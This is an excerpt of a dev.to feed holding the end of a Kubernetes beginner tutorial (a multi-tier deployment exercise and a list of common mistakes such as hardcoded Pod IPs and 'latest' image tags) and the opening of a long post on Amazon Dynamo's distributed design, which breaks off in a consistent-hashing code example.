&lt;p&gt;&lt;strong&gt;Pod Disruption Budgets (PDB)&lt;/strong&gt; — Guarantee a minimum number of Pods stay up during voluntary disruptions (like node maintenance).&lt;/p&gt;

&lt;h3&gt;
  
  
  Managed Kubernetes: Running in Production
&lt;/h3&gt;

&lt;p&gt;In production, most teams use a managed Kubernetes service where the cloud provider operates the control plane for you:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Provider&lt;/th&gt;
&lt;th&gt;Service&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AWS&lt;/td&gt;
&lt;td&gt;EKS (Elastic Kubernetes Service)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google Cloud&lt;/td&gt;
&lt;td&gt;GKE (Google Kubernetes Engine)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Azure&lt;/td&gt;
&lt;td&gt;AKS (Azure Kubernetes Service)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DigitalOcean&lt;/td&gt;
&lt;td&gt;DOKS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hetzner (budget option)&lt;/td&gt;
&lt;td&gt;No managed offering — typically self-managed k3s or kubeadm on Hetzner Cloud&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Where to Go Next
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Official Kubernetes Docs&lt;/td&gt;
&lt;td&gt;&lt;a href="https://kubernetes.io/docs/home/" rel="noopener noreferrer"&gt;kubernetes.io/docs&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Interactive Tutorial (browser, no setup needed)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://kubernetes.io/docs/tutorials/kubernetes-basics/" rel="noopener noreferrer"&gt;kubernetes.io/docs/tutorials&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;KodeKloud (video + interactive labs)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://kodekloud.com/" rel="noopener noreferrer"&gt;kodekloud.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CNCF Landscape (ecosystem map)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://landscape.cncf.io/" rel="noopener noreferrer"&gt;landscape.cncf.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes the Hard Way&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/kelseyhightower/kubernetes-the-hard-way" rel="noopener noreferrer"&gt;github.com/kelseyhightower&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Play with Kubernetes (browser-based cluster)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://labs.play-with-k8s.com/" rel="noopener noreferrer"&gt;labs.play-with-k8s.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CKA Exam (Certified Kubernetes Administrator)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.cncf.io/training/certification/#cka" rel="noopener noreferrer"&gt;cncf.io/training/certification/#cka&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Final Exercise: Deploy a Multi-Tier App
&lt;/h2&gt;

&lt;p&gt;Try deploying a simple app with a frontend and a backend. Here's your challenge:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Create a Namespace called &lt;code&gt;my-project&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Deploy nginx as your "frontend" with 2 replicas in that namespace&lt;/li&gt;
&lt;li&gt;Deploy &lt;code&gt;kennethreitz/httpbin&lt;/code&gt; as your "backend" with 2 replicas&lt;/li&gt;
&lt;li&gt;Create ClusterIP Services for both&lt;/li&gt;
&lt;li&gt;Enable the nginx Ingress controller and create an Ingress that routes &lt;code&gt;/&lt;/code&gt; to frontend and &lt;code&gt;/api&lt;/code&gt; to backend&lt;/li&gt;
&lt;li&gt;Add a ConfigMap with a custom environment variable and reference it in the backend Deployment&lt;/li&gt;
&lt;li&gt;Set resource requests and limits on both Deployments&lt;/li&gt;
&lt;li&gt;Add a readiness probe to both Deployments&lt;/li&gt;
&lt;li&gt;Scale the frontend to 4 replicas&lt;/li&gt;
&lt;li&gt;Trigger a rolling update on the frontend (change image to &lt;code&gt;nginx:alpine&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Roll it back&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This covers: Namespaces, Deployments, Services, Ingress, ConfigMaps, Resource Management, Health Probes, Scaling, Rolling Updates, and Rollbacks — everything from this series!&lt;/p&gt;
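&lt;p&gt;If you want a starting push, the first few steps can be done imperatively (adjust names as you like; the rest of the challenge is yours):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl create namespace my-project

&lt;span class="c"&gt;# Frontend and backend Deployments (step 2 and 3)&lt;/span&gt;
kubectl create deployment frontend &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;nginx &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2 &lt;span class="nt"&gt;-n&lt;/span&gt; my-project
kubectl create deployment backend &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;kennethreitz/httpbin &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2 &lt;span class="nt"&gt;-n&lt;/span&gt; my-project

&lt;span class="c"&gt;# ClusterIP Services (step 4)&lt;/span&gt;
kubectl expose deployment frontend &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80 &lt;span class="nt"&gt;-n&lt;/span&gt; my-project
kubectl expose deployment backend &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80 &lt;span class="nt"&gt;-n&lt;/span&gt; my-project

&lt;span class="c"&gt;# Ingress controller (step 5, minikube)&lt;/span&gt;
minikube addons &lt;span class="nb"&gt;enable &lt;/span&gt;ingress
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;From step 6 onward you'll want declarative YAML — editing manifests is exactly the muscle this exercise is meant to build.&lt;/p&gt;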





&lt;h2&gt;
  
  
  Appendix — Common Beginner Mistakes
&lt;/h2&gt;

&lt;p&gt;These mistakes are extremely common. Knowing them in advance will save you hours of debugging.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Hardcoding Pod IPs
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Connecting to a Pod by its IP address directly.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; Pod IPs change every time a Pod is rescheduled or restarted.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Always use a Service name. Use DNS: &lt;code&gt;http://my-service&lt;/code&gt; or &lt;code&gt;http://my-service.my-namespace&lt;/code&gt;.&lt;/p&gt;
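&lt;p&gt;A quick way to confirm Service DNS resolves from inside the cluster (the service and namespace names here are placeholders):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Launch a throwaway Pod and hit the Service by its DNS name&lt;/span&gt;
kubectl run dns-test &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  wget &lt;span class="nt"&gt;-qO-&lt;/span&gt; http://my-service.my-namespace.svc.cluster.local
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;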

&lt;h3&gt;
  
  
  2. Using NodePort in Production
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Exposing apps via NodePort for production traffic.&lt;br&gt;
&lt;strong&gt;Why it's wrong:&lt;/strong&gt; It opens a high-numbered port on every node, offers no TLS termination or host-based routing, and forces clients to track individual node addresses.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Use LoadBalancer Services or an Ingress backed by a LoadBalancer-type controller.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Not Setting Resource Requests
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Deploying Pods with no &lt;code&gt;resources.requests&lt;/code&gt; defined.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; The scheduler has no data to place Pods correctly. Nodes can become overloaded, causing unpredictable OOMKills and CPU starvation across the cluster.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Always set both &lt;code&gt;requests&lt;/code&gt; and &lt;code&gt;limits&lt;/code&gt;. Start conservative and tune based on observed usage.&lt;/p&gt;
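&lt;p&gt;As a sketch — the values below are illustrative starting points, not recommendations — requests and limits sit under each container spec:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;spec:
  containers:
  - name: my-app
    image: myapp:v1.4.2
    resources:
      requests:            # what the scheduler uses for placement
        cpu: "100m"
        memory: "128Mi"
      limits:              # hard caps enforced at runtime
        cpu: "500m"
        memory: "256Mi"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Compare against real usage with &lt;code&gt;kubectl top pods&lt;/code&gt; and tune from there.&lt;/p&gt;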

&lt;h3&gt;
  
  
  4. Running Databases in Deployments
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Using a Deployment for stateful apps like PostgreSQL or MySQL.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; Deployments don't guarantee stable Pod names, stable network identity, or ordered startup/shutdown — all of which clustered databases depend on.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Use StatefulSets for any stateful workload that requires identity or ordered operations.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Not Setting Readiness Probes
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Deploying apps with no readiness probe.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; Kubernetes sends traffic to a Pod the moment the container starts — even before your app has finished initializing. Users hit errors during startup and rolling updates.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Add a readiness probe that checks your app's actual health endpoint before traffic is sent to it.&lt;/p&gt;

&lt;h3&gt;
  
  
  6. Storing Secrets in Git or ConfigMaps
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Committing Secret YAML with real values to source control, or storing passwords in ConfigMaps.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; Once a secret lands in git history, it must be treated as compromised forever. ConfigMaps aren't handled as sensitive data — anything with read access sees plaintext values, and they're excluded from Secret-specific protections like encryption at rest.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Use &lt;code&gt;kubectl create secret&lt;/code&gt; from CI/CD pipelines, or a secrets management tool like Vault or Sealed Secrets.&lt;/p&gt;

&lt;h3&gt;
  
  
  7. Using &lt;code&gt;latest&lt;/code&gt; Image Tags
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Deploying with &lt;code&gt;image: myapp:latest&lt;/code&gt;.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; &lt;code&gt;latest&lt;/code&gt; is mutable — the same tag can point to different images over time, making rollbacks unreliable and deployments non-deterministic.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Always use immutable, specific version tags like &lt;code&gt;myapp:v1.4.2&lt;/code&gt; or &lt;code&gt;myapp:sha-abc1234&lt;/code&gt;.&lt;/p&gt;
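&lt;p&gt;For example — the deployment and image names here are placeholders — rolling out a pinned tag and verifying it:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Roll out a specific, immutable version&lt;/span&gt;
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;image deployment/my-app &lt;span class="nv"&gt;my-app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;myapp:v1.4.2
kubectl rollout status deployment/my-app

&lt;span class="c"&gt;# Roll back if the new tag misbehaves&lt;/span&gt;
kubectl rollout undo deployment/my-app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;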

&lt;h3&gt;
  
  
  8. Ignoring the Events Section
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Only looking at Pod status (&lt;code&gt;Running&lt;/code&gt;, &lt;code&gt;CrashLoopBackOff&lt;/code&gt;) and not reading events.&lt;br&gt;
&lt;strong&gt;Why it slows you down:&lt;/strong&gt; Events are where Kubernetes tells you &lt;em&gt;why&lt;/em&gt; something failed — image pull errors, OOMKills, failed scheduling, volume mount failures.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Always run &lt;code&gt;kubectl describe pod &amp;lt;name&amp;gt;&lt;/code&gt; and read the Events section at the bottom first when debugging.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Happy orchestrating! 🚢&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;a href="https://notebooklm.google.com/notebook/5b8e1cc6-07fe-420a-ade9-cad8ddee8817" rel="noopener noreferrer"&gt;NotebookLM Link&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>go</category>
      <category>cloud</category>
      <category>devops</category>
    </item>
    <item>
      <title>Understanding Amazon Dynamo: A Deep Dive into Distributed System Design</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Sat, 21 Feb 2026 04:01:05 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/understanding-amazon-dynamo-a-deep-dive-into-distributed-system-design-5a49</link>
      <guid>https://dev.to/piyushjajoo/understanding-amazon-dynamo-a-deep-dive-into-distributed-system-design-5a49</guid>
      <description>&lt;p&gt;&lt;em&gt;A senior engineer's perspective on building highly available distributed systems&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Introduction: Why Dynamo Changed Everything&lt;/li&gt;
&lt;li&gt;The CAP Theorem Trade-off&lt;/li&gt;
&lt;li&gt;
Core Architecture Components

&lt;ul&gt;
&lt;li&gt;Consistent Hashing for Partitioning&lt;/li&gt;
&lt;li&gt;Replication Strategy (N, R, W)&lt;/li&gt;
&lt;li&gt;Vector Clocks for Versioning&lt;/li&gt;
&lt;li&gt;Sloppy Quorum and Hinted Handoff&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Conflict Resolution: The Shopping Cart Problem&lt;/li&gt;
&lt;li&gt;Read and Write Flow&lt;/li&gt;
&lt;li&gt;Merkle Trees for Anti-Entropy&lt;/li&gt;
&lt;li&gt;Membership and Failure Detection&lt;/li&gt;
&lt;li&gt;Performance Characteristics: Real Numbers&lt;/li&gt;
&lt;li&gt;Partitioning Strategy Evolution&lt;/li&gt;
&lt;li&gt;Comparing Dynamo to Modern Systems&lt;/li&gt;
&lt;li&gt;What Dynamo Does NOT Give You&lt;/li&gt;
&lt;li&gt;Practical Implementation Example&lt;/li&gt;
&lt;li&gt;Key Lessons for System Design&lt;/li&gt;
&lt;li&gt;When NOT to Use Dynamo-Style Systems&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;li&gt;Appendix: Design Problems and Approaches&lt;/li&gt;
&lt;/ol&gt;

&lt;blockquote&gt;
&lt;p&gt;This is a long-form reference — every section stands on its own, so feel free to jump directly to whatever is most relevant to you.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction: Why Dynamo Changed Everything
&lt;/h2&gt;

&lt;p&gt;When Amazon published the Dynamo paper in 2007, it wasn't just another academic exercise. It was a battle-tested solution to real problems at massive scale. I remember when I first read this paper—it fundamentally changed how I thought about distributed systems.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dynamo is a distributed key-value storage system.&lt;/strong&gt; It was designed to support Amazon’s high-traffic services such as the shopping cart and session management systems. There are no secondary indexes, no joins, no relational semantics—just keys and values, with extreme focus on availability and scalability. It does not provide linearizability or global ordering guarantees, even at the highest quorum settings. If your system requires those properties, Dynamo is not the right tool.&lt;/p&gt;

&lt;p&gt;The core problem Amazon faced was simple to state but brutal to solve: &lt;strong&gt;How do you build a storage system that never says "no" to customers?&lt;/strong&gt; When someone tries to add an item to their shopping cart during a network partition or server failure, rejecting that write isn't acceptable. Every lost write is lost revenue and damaged customer trust.&lt;/p&gt;

&lt;h2&gt;
  
  
  The CAP Theorem Trade-off: Why Dynamo Chooses Availability
&lt;/h2&gt;

&lt;p&gt;Before diving into how Dynamo works, you need to understand the fundamental constraint it's designed around.&lt;/p&gt;

&lt;h3&gt;
  
  
  What is CAP Theorem?
&lt;/h3&gt;

&lt;p&gt;The CAP theorem describes a fundamental trade-off in distributed systems: when a network partition occurs, you must choose between consistency and availability. The three properties are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Consistency (C)&lt;/strong&gt;: All nodes see the same data at the same time&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Availability (A)&lt;/strong&gt;: Every request gets a response (success or failure)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Partition Tolerance (P)&lt;/strong&gt;: System continues working despite network failures&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A common shorthand is "pick 2 of 3," but this is an oversimplification. In practice, network partitions are unavoidable at scale, so the real decision is: &lt;strong&gt;when partitions occur (and they will), do you sacrifice consistency or availability?&lt;/strong&gt; That's the actual design choice.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The harsh reality&lt;/strong&gt;: Network partitions WILL happen. Cables get cut, switches fail, datacenters lose connectivity. You can't avoid them, so you must choose: Consistency or Availability?&lt;/p&gt;

&lt;h3&gt;
  
  
  Traditional Databases Choose Consistency
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F76cak8izc7bxpluwefm5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F76cak8izc7bxpluwefm5.png" alt="image" width="800" height="411"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Traditional approach&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Database: "I can't guarantee all replicas are consistent,
           so I'll reject your write to be safe."
Result: Customer sees error, cart is empty
Impact: Lost revenue, poor experience
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Dynamo Chooses Availability
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F38je9jp0bdihea29u9mm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F38je9jp0bdihea29u9mm.png" alt="image" width="800" height="546"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dynamo's approach&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Dynamo: "I'll accept your write with the replicas I can reach.
         The unreachable replica will catch up later."
Result: Customer sees success, item in cart
Impact: Sale continues, happy customer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The Trade-off Visualized
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;When a partition occurs:

Traditional Database: Choose C over A → Sacrifice Availability
- ✓ All replicas always have same data
- ✓ No conflicts to resolve
- ❌ Rejects writes during failures
- ❌ Poor customer experience
- ❌ Lost revenue

Dynamo:              Choose A over C → Sacrifice Strong Consistency
- ✓ Accepts writes even during failures
- ✓ Excellent customer experience
- ✓ No lost revenue
- ❌ Replicas might temporarily disagree
- ❌ Application must handle conflicts
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Real Amazon Example: Black Friday Shopping Cart
&lt;/h3&gt;

&lt;p&gt;Imagine it's Black Friday. Millions of customers are shopping. A network cable gets cut between datacenters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;With traditional database&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Time: 10:00 AM - Network partition occurs
Result: 
- All shopping cart writes fail
- "Service Unavailable" errors
- Customers can't checkout
- Twitter explodes with complaints
- Estimated lost revenue: $100,000+ per minute
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;With Dynamo&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Time: 10:00 AM - Network partition occurs
Result:
- Shopping cart writes continue
- Customers see success
- Some carts might have conflicts (rare)
- Application merges conflicting versions
- Estimated lost revenue: $0
- A few edge cases need conflict resolution (acceptable)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Why This Choice Makes Sense for E-commerce
&lt;/h3&gt;

&lt;p&gt;Amazon did the math:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Cost of rejecting a write&lt;/strong&gt;: Immediate lost sale ($50-200)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cost of accepting a conflicting write&lt;/strong&gt;: Occasionally need to merge shopping carts (rarely happens, easily fixable)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Business decision&lt;/strong&gt;: Accept writes, deal with rare conflicts&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Types of data where Availability &amp;gt; Consistency&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Shopping carts (merge conflicting additions)&lt;/li&gt;
&lt;li&gt;Session data (last-write-wins is fine)&lt;/li&gt;
&lt;li&gt;User preferences (eventual consistency acceptable)&lt;/li&gt;
&lt;li&gt;Best seller lists (approximate is fine)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Types of data where Consistency &amp;gt; Availability&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Bank account balances (can't have conflicting balances)&lt;/li&gt;
&lt;li&gt;Inventory counts (can't oversell)&lt;/li&gt;
&lt;li&gt;Transaction logs (must be ordered)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is why Dynamo isn't for everything—but for Amazon's e-commerce use cases, choosing availability over strong consistency was the right trade-off.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important nuance&lt;/strong&gt;: While Dynamo is often described as an AP system, it's more accurate to call it a &lt;strong&gt;tunable consistency system&lt;/strong&gt;. Depending on your R and W quorum configuration, it can behave closer to CP. The AP label applies to its default/recommended configuration optimized for e-commerce workloads.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Core Architecture Components
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Consistent Hashing for Partitioning
&lt;/h3&gt;

&lt;p&gt;Let me explain this with a concrete example, because consistent hashing is one of those concepts that seems magical until you see it in action.&lt;/p&gt;

&lt;h4&gt;
  
  
  The Problem: Traditional Hash-Based Sharding
&lt;/h4&gt;

&lt;p&gt;Imagine you have 3 servers and want to distribute data across them. The naive approach:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Traditional approach - DON'T DO THIS
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get_server&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;num_servers&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;hash_value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;hash_value&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="n"&gt;num_servers&lt;/span&gt;  &lt;span class="c1"&gt;# Modulo operation
&lt;/span&gt;
&lt;span class="c1"&gt;# With 3 servers:
&lt;/span&gt;&lt;span class="nf"&gt;get_server&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_123&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# Returns server 0
&lt;/span&gt;&lt;span class="nf"&gt;get_server&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_456&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# Returns server 1
&lt;/span&gt;&lt;span class="nf"&gt;get_server&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_789&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# Returns server 2
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This works... until you add or remove a server. Let's see what happens when we go from 3 to 4 servers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Before (3 servers):
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_123&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
